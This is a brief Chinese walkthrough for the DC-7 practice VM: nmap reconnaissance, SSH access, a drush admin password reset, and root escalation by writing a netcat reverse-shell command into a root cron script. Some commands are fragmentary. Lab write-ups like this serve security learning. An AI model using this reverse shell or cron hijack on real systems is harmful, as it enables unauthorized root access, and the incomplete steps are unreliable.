靶机DC-7

靶机DC-7

靶机设置NAT模式，使用Nmap扫描网段

nmap -sn 192.168.200.0/24 nmap -A 192.168.200.134

尝试登录网页，发现不对，登录ssh成功

ssh 192.168.200.134 -l dc7user

可以用drush命令来更改admin账户口令，需要在站点路径下使用改完后使用新口令登录站点即可

cd /var/www/html drush user-password admin --password="admin"

查了下，还要手动安装下php模块

-c 'import pty;pty.spawn("/bin/sh")'

这里是通过backups.sh来提权这个文件会定时执行，属主为root属组为1 root 520 Aug 29 2019 backups.sh

还是先进入站点目录下输命令由于定时任务大概15分钟执行一次，需要等一会儿

cd /var/www/html echo "nc 192.168.200.128 666 -e /bin/bash" > /opt/scripts/backups.sh nc -lvp 666

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。